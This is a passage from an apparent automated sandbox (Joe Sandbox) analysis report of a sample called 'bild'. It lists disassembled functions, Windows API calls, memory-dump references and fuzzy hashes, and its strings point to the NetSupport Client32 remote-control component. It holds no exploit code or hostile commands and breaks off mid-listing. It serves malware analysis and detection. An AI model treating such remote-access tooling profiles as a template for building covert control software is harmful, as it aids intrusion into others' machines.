                                                                                      • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00EEB898,000000FF,?), ref: 11144EE5
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                      • String ID:
                                                                                      • API String ID: 3768737497-0
                                                                                      • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                      • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                      • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                      • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                      Function 110106C0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: LockitLockit::_std::_
                                                                                      • String ID:
                                                                                      • API String ID: 3382485803-0
                                                                                      • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                      • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                      • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                      • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                      Function 11143000 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: QueryValue
                                                                                      • String ID:
                                                                                      • API String ID: 3660427363-0
                                                                                      • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                      • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                      • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                      • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                      Function 110FACC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InformationToken
                                                                                      • String ID:
                                                                                      • API String ID: 4114910276-0
                                                                                      • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                      • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                      • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                      • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                      Function 11170166 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap__getptd_noexit
                                                                                      • String ID:
                                                                                      • API String ID: 328603210-0
                                                                                      • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                      • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                      • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                      • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                      Function 111672E3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __waccess_s
                                                                                      • String ID:
                                                                                      • API String ID: 4272103461-0
                                                                                      • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                      • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                      • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                      • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                      Function 11163FED Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __fsopen
                                                                                      • String ID:
                                                                                      • API String ID: 3646066109-0
                                                                                      • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                      • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                      • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                      • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                      Function 00821000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _NSMClient32@8.PCICL32(?,?,?,008210A2,00000000), ref: 0082100B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3580718425.0000000000821000.00000020.00000001.01000000.00000009.sdmp, Offset: 00820000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3580699277.0000000000820000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_820000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Client32@8
                                                                                      • String ID:
                                                                                      • API String ID: 433899448-0
                                                                                      • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                      • Instruction ID: 3b5da6fcc3abeb7a8d03ad64514e5dee16c4e52ebd5120bcea04ae6e619d87ac
                                                                                      • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                      • Instruction Fuzzy Hash: 3FB092B211434D9B8B14EE99E845C7B339CBAA8600B000809BE0583282CA61FCA09672

                                                                                      Non-executed Functions

                                                                                      Function 1102D330 Relevance: 72.3, APIs: 21, Strings: 20, Instructions: 575sleepfileshutdownCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                      • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                        • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                        • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                        • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                        • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                      • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                      • SetEvent.KERNEL32(00000270), ref: 1102D3E7
                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                      • PostThreadMessageA.USER32(00001E6C,00000000,00000000,00000000), ref: 1102D5BC
                                                                                      • CloseHandle.KERNEL32(0000027C), ref: 1102D815
                                                                                      • _free.LIBCMT ref: 1102D825
                                                                                      • _free.LIBCMT ref: 1102D841
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                      • _memset.LIBCMT ref: 1102D983
                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                      • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                      • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                      • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                      • String ID: *.*$405464$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices$
                                                                                      • API String ID: 2369127096-377297859
                                                                                      • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                      • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                      • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                      • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                      Function 11113290 Relevance: 44.0, APIs: 29, Instructions: 470windowsleepkeyboardCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 111132BA
                                                                                      • GetTickCount.KERNEL32 ref: 1111332E
                                                                                      • CreateRectRgn.GDI32(00000000,?,?,?), ref: 11113352
                                                                                      • GetClientRect.USER32(?,?), ref: 11113402
                                                                                      • SetStretchBltMode.GDI32(?,00000004), ref: 11113534
                                                                                      • CreateRectRgn.GDI32(?,?,?,?), ref: 1111358F
                                                                                      • GetClipRgn.GDI32(?,00000000), ref: 111135A3
                                                                                      • OffsetRgn.GDI32(00000000,00000000,00000000), ref: 111135C8
                                                                                      • GetRgnBox.GDI32(00000000,?), ref: 111135D3
                                                                                      • SelectClipRgn.GDI32(?,00000000), ref: 111135E1
                                                                                      • StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1111366B
                                                                                      • SelectClipRgn.GDI32(?,00000000), ref: 1111367A
                                                                                      • DeleteObject.GDI32(?), ref: 11113684
                                                                                      • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 111136C2
                                                                                      • GetWindowOrgEx.GDI32(?,?), ref: 111136D7
                                                                                      • StretchBlt.GDI32(?,?,?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1111371C
                                                                                      • GetKeyState.USER32(000000A3), ref: 11113747
                                                                                      • CreatePen.GDI32(00000000,00000001,000000FF), ref: 1111378B
                                                                                      • CreatePen.GDI32(00000000,00000001,00FFFFFF), ref: 1111379D
                                                                                      • SelectObject.GDI32(00000000,?), ref: 111137B1
                                                                                      • Polyline.GDI32(00000000,?,00000005), ref: 111137C7
                                                                                      • Sleep.KERNEL32(00000032), ref: 111137CF
                                                                                      • SelectObject.GDI32(00000000,?), ref: 111137E0
                                                                                      • Polyline.GDI32(00000000,?,00000005), ref: 111137F3
                                                                                      • Sleep.KERNEL32(00000032), ref: 111137FB
                                                                                      • SelectObject.GDI32(00000000,?), ref: 1111380C
                                                                                      • DeleteObject.GDI32(?), ref: 11113816
                                                                                      • DeleteObject.GDI32(?), ref: 11113820
                                                                                      • BitBlt.GDI32(00000000,00000000,00000000,00004000,?,?,00000000,00000000,00CC0020), ref: 11113845
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Select$CreateStretch$ClipDeleteRect$PolylineSleep$ClientCountIconicModeOffsetStateTickWindow
                                                                                      • String ID:
                                                                                      • API String ID: 879653699-0
                                                                                      • Opcode ID: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                      • Instruction ID: 189fb298e01def9bf465b0ce988e90e2b94731e78913cb033f8d66d61a6768cc
                                                                                      • Opcode Fuzzy Hash: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                      • Instruction Fuzzy Hash: E112F7B1A147099FDB14CFB8C984AAEF7F9EF88315F10452DE55A9B258DB70A841CF10
                                                                                      Function 1103B160 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 196fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
